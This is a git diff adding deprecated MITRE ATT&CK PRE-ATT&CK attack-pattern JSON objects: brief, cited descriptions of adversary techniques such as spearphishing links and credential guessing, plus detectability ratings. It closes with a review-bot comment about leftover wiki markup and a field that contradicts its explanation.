@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--a2d4d173-456c-458e-9e4f-d077d6196e34", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--46017368-6e09-412b-a29c-385be201cc03", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain domain/IP registration information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1251).\n\nFor a computing resource to be accessible to the public, domain names and IP addresses must be registered with an authorized organization. (Citation: Google Domains WHOIS) (Citation: FunAndSun2012) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1251", + "external_id": "T1251" + }, + { + "source_name": "Google Domains WHOIS", + "description": "Google Domains. (n.d.). About WHOIS. Retrieved April 2, 2017." + }, + { + "source_name": "FunAndSun2012", + "description": "Jeff Bardin. (2012, October 10). OSINT and Cyber Intelligence - Fun and Sun in Miami. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Open access to DNS registration/routing information is inherent in Internet architecture.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Proliferation of DNS information makes registration information functionally freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1028", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4886e3c2-468b-4e26-b7e5-2031d995d13a.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4886e3c2-468b-4e26-b7e5-2031d995d13a.json new file mode 100644 index 0000000000000000000000000000000000000000..83b6d4e0f0f25f6e08c7e8f514231625423a5a1b --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4886e3c2-468b-4e26-b7e5-2031d995d13a.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--cb202651-204e-4f42-8dab-c317ae46aa64", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--4886e3c2-468b-4e26-b7e5-2031d995d13a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build or acquire exploits", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1349).\n\nAn exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may use or modify existing exploits when those exploits are still relevant to the environment they are trying to compromise. (Citation: NYTStuxnet) (Citation: NationsBuying)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1349", + "external_id": "T1349" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + }, + { + "source_name": "NationsBuying", + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. 
Retrieved March 9, 2017.", + "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1126", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6.json new file mode 100644 index 0000000000000000000000000000000000000000..c35d05bcd99895b525202a577ebef6a4fb22f8ef --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--647282eb-2f81-4e7b-88dd-bc75539622f0", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party software services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1330).\n\nA wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1330", + "external_id": "T1330" + }, + { + "source_name": "LOWBALL2015", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility over account creation for 3rd party software services.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "3rd party services like these listed are freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1107", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--489a7797-01c3-4706-8cd1-ec56a9db3adc.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--489a7797-01c3-4706-8cd1-ec56a9db3adc.json new file mode 100644 index 0000000000000000000000000000000000000000..c30ce457843c229c61fbbdb2d760b1f4abccc55a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--489a7797-01c3-4706-8cd1-ec56a9db3adc.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--eb6e7a08-0759-43c6-9252-c8e078d90b8e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1369", + "url": "https://attack.mitre.org/techniques/T1369" + }, + { + "description": "Nick Johnston. (2014, March 13). Google Docs Users Targeted by Sophisticated Phishing Scam. Retrieved March 29, 2017.", + "source_name": "GoogleDrive Phishing" + }, + { + "description": "Bob Griffin. (2015, May 16). THE ON-GOING THREAT OF SOCIAL ENGINEERING. Retrieved March 9, 2017.", + "source_name": "RSASEThreat" + } + ], + "description": "**This technique has been deprecated. Please use [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002).**\n\nEmails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)", + "name": "Spear phishing messages with malicious links", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--489a7797-01c3-4706-8cd1-ec56a9db3adc", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:25:58.783Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses_explanation": "Defenders can implement mechanisms to analyze links and identify levels of concerns. However, the adversary has the advantage of creating new links or finding ways to obfuscate the link so that common detection lists can not identify it. 
Detection of a malicious link could be identified once the file has been downloaded.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Sending emails is trivial and expected. The adversary needs to ensure links don't get tampered, removed, or flagged as a previously black-listed site.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1146" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077.json new file mode 100644 index 0000000000000000000000000000000000000000..4dd8b7ffb5a3c26932191163bcb0e9ded60ced66 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--477324fc-a306-4574-a608-fa6b52e366f1", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise 3rd party infrastructure to support delivery", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1312).\n\nInstead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1312", + "external_id": "T1312" + }, + { + "source_name": "WateringHole2014", + "description": "Pierluigi Paganini. (2014, February 15). FireEye discovered a new watering hole attack based on 0-day exploit. Retrieved March 1, 2017." + }, + { + "source_name": "FireEye Operation SnowMan", + "description": "Darien Kindlund, Xiaobo Chen, Mike Scott, Ned Moran, Dan Caselden. (2014, February 13). Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website. Retrieved March 28, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commonly used technique currently (e.g., [https://www.wordpress.com WordPress] sites) as precursor activity to launching attack against intended target (e.g., acquiring botnet or layers of proxies for reducing attribution possibilities).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1089", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4aeafdb3-eb0b-4e8e-b93f-95cd499088b4.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4aeafdb3-eb0b-4e8e-b93f-95cd499088b4.json new file mode 100644 index 0000000000000000000000000000000000000000..df74ab87a88ac28380f20c15a70a4d7100d7da14 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4aeafdb3-eb0b-4e8e-b93f-95cd499088b4.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--52bc0882-0410-4c90-b750-f23a6b781dcc", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--4aeafdb3-eb0b-4e8e-b93f-95cd499088b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise of externally facing system", + "description": "**This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nExternally facing systems allow connections from outside the network as a normal course of operations. Externally facing systems may include, but are not limited to, websites, web portals, email, DNS, FTP, VPN concentrators, and boarder routers and firewalls. These systems could be in a demilitarized zone (DMZ) or may be within other parts of the internal environment. (Citation: CylanceOpCleaver) (Citation: DailyTechAntiSec)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1388", + "url": "https://attack.mitre.org/techniques/T1388" + }, + { + "description": "CYLANCE. (n.d.). Operation Cleaver. Retrieved March 6, 2017.", + "source_name": "CylanceOpCleaver" + }, + { + "description": "Jason Mick. (2011, July 12). AntiSec Exposes U.S. Soldiers' S/Ns, Passwords, Vows Attack on Monsanto. 
Retrieved March 9, 2017.", + "source_name": "DailyTechAntiSec" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:16:12.162Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1165", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "DMZ environments are specifically designed to be isolated because one assumes they will ultimately be compromised by the adversary.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Most DMZs are monitored but are also designed so that if they are compromised, the damage/risk is limited.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4dfb98ea-03cc-4a9c-a3a7-b22e14f126c4.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4dfb98ea-03cc-4a9c-a3a7-b22e14f126c4.json new file mode 100644 index 0000000000000000000000000000000000000000..f98003b82fb4e8a37753145f3399deb7bdd08b32 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4dfb98ea-03cc-4a9c-a3a7-b22e14f126c4.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--fbbe096b-ed34-4c9f-87fa-ba30637f4cd2", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--4dfb98ea-03cc-4a9c-a3a7-b22e14f126c4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Authentication attempt", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nAttempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials to authenticate remotely. This access could be to a web portal, through a VPN, or in a phone app. (Citation: Remote Access Healthcare) (Citation: RDP Point of Sale)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1381", + "url": "https://attack.mitre.org/techniques/T1381" + }, + { + "description": "Gary Glover. (2015, June 25). Remote access threats are imminent. Retrieved March 31, 2017.", + "source_name": "Remote Access Healthcare" + }, + { + "description": "Brian Prince. (2014, July 31). Hackers Turn Remote Desktop Tools Into Gateways for Point-of-Sale Malware Attacks. Retrieved March 31, 2017.", + "source_name": "RDP Point of Sale" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:13:56.705Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1158", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Attempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials. 
This is increasingly difficult to obtain access when two-factor authentication mechanisms are employed.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "This is possible with diligent monitoring of login anomalies, expected user behavior/location. If the adversary uses legitimate credentials, it may go undetected.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4fad17d3-8f42-449d-ac4b-dbb4c486127d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4fad17d3-8f42-449d-ac4b-dbb4c486127d.json new file mode 100644 index 0000000000000000000000000000000000000000..1bef4b4b92efea54b9529fa5c2fb984f64b93110 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4fad17d3-8f42-449d-ac4b-dbb4c486127d.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--e6592e72-5fc5-45da-ba2e-7a293098b028", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--4fad17d3-8f42-449d-ac4b-dbb4c486127d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assign KITs, KIQs, and/or intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1238).\n\nOnce generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1238", + "external_id": "T1238" + }, + { + "source_name": "AnalystsAndPolicymaking", + "description": "Jack Davis. (2002, September). Improving CIA Analytic Performance: Analysts and the Policymaking Process. Retrieved March 5, 2017." + }, + { + "source_name": "JP2-01", + "description": "Joint Chiefs of Staff. (2012, January 05). Joint and National Intelligence Support to Military Operations. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. 
Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1015", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--51bca707-a806-49bf-91e0-03885b0ac85c.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--51bca707-a806-49bf-91e0-03885b0ac85c.json new file mode 100644 index 0000000000000000000000000000000000000000..280dc8f79d473dc6d3b4f8ac1fdbd6ac760d55be --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--51bca707-a806-49bf-91e0-03885b0ac85c.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--81b28e5e-bba9-45af-badc-872beab91e81", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--51bca707-a806-49bf-91e0-03885b0ac85c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct cost/benefit analysis", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1226).\n\nLeadership conducts a cost/benefit analysis that generates a compelling need for information gathering which triggers a Key Intelligence Toptic (KIT) or Key Intelligence Question (KIQ). For example, an adversary compares the cost of cyber intrusions with the expected benefits from increased intelligence collection on cyber adversaries. (Citation: LowenthalCh4) (Citation: KIT-Herring)", + "external_references": [ + { + "external_id": "T1226", + "url": "https://attack.mitre.org/techniques/T1226", + "source_name": "mitre-pre-attack" + }, + { + "description": "Mark M. Lowenthal. (n.d.). Ch 4: The Intelligence Process--A Macro Look; Who Does What for Whome?, Intelligence: From Secrets to Policy. Retrieved March 2, 2017.", + "source_name": "LowenthalCh4" + }, + { + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. 
Retrieved May 19, 2017.", + "source_name": "KIT-Herring" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "priority-definition-planning", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1003", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5436571f-2332-4b51-b7ed-0bc822fe02c2.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5436571f-2332-4b51-b7ed-0bc822fe02c2.json new file mode 100644 index 0000000000000000000000000000000000000000..4661e3fc4f713c1de64c44bf3b60217e87342b1a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5436571f-2332-4b51-b7ed-0bc822fe02c2.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--a5fdb8f7-a45b-465e-b82d-64ec660505b5", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--5436571f-2332-4b51-b7ed-0bc822fe02c2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "OS-vendor provided communication channels", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1390).\n\nGoogle and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. (Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1390", + "external_id": "T1390" + }, + { + "source_name": "Securelist Mobile Malware 2013", + "description": "Roman Unuchek, Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved April 12, 2017." + }, + { + "source_name": "DroydSeuss", + "description": "Alberto Coletta, Victor van der Veen, and Federico Maggi. (2016). DroydSeuss: A Mobile Banking Trojan Tracker - Short Paper. Retrieved April 12, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "These services are heavily utilized by mainstream mobile app developers. High volume of communications makes it extremely hard for a defender to distinguish between legitimate and adversary communications.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "These are free services provided by Google and Apple to app developers, and information on how to use them is readily available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1167", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54a42187-a20c-4e4e-ba31-8d15c9e1f57f.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54a42187-a20c-4e4e-ba31-8d15c9e1f57f.json new file mode 100644 index 0000000000000000000000000000000000000000..53b825dd003a3d0d24545ab38a4ca584ca7f9d18 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54a42187-a20c-4e4e-ba31-8d15c9e1f57f.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--b9a9e538-b24d-4ccc-8bc6-7a320f08716b", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--54a42187-a20c-4e4e-ba31-8d15c9e1f57f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "SSL certificate acquisition for trust breaking", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1338).\n\nFake certificates can be acquired by legal process or coercion. Or, an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1338", + "external_id": "T1338" + }, + { + "source_name": "SubvertSSL", + "description": "Ryan Singel. (2010, March 24). Law Enforcement Appliance Subverts SSL. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The certificate authority who is hacked cannot easily see they've been compromised, but [https://www.google.com Google] has caught on to this occurring in previous attacks such as DigiNotarDigiNotar2016 and [https://www.verisign.com Verisign].", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "One example of it occurring in the real world is the DigiNotarDigiNotar2016 case. 
To be able to do this usually requires sophisticated skills and is traditionally done by a nation state to spy on its citizens.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1115", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe.json new file mode 100644 index 0000000000000000000000000000000000000000..b91f0d5fa20695b7f7b234c5b97d2ac8f9d18ae3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe.json 
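Review bot: The `x_mitre_detectable_by_common_defenses_explanation` and `x_mitre_difficulty_for_adversary_explanation` values in this object still carry MediaWiki residue (`[https://www.google.com Google]`, `[https://www.verisign.com Verisign]`, the fused citation key `DigiNotarDigiNotar2016`), unlike `description`, which is markdown with explicit `(Citation: SubvertSSL)` markers. A consumer that renders or trains on the `x_mitre_*_explanation` fields needs a cleanup step for `[url label]` links and glued citation keys, or should restrict itself to `description`; the text itself is vendored and should not be edited in place. Note also that `x_mitre_detectable_by_common_defenses` is `"No"` while the explanation says such cases have been caught, and the sibling objects use `"Partial"` for that situation, so treat the free text as commentary rather than as the field's value.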
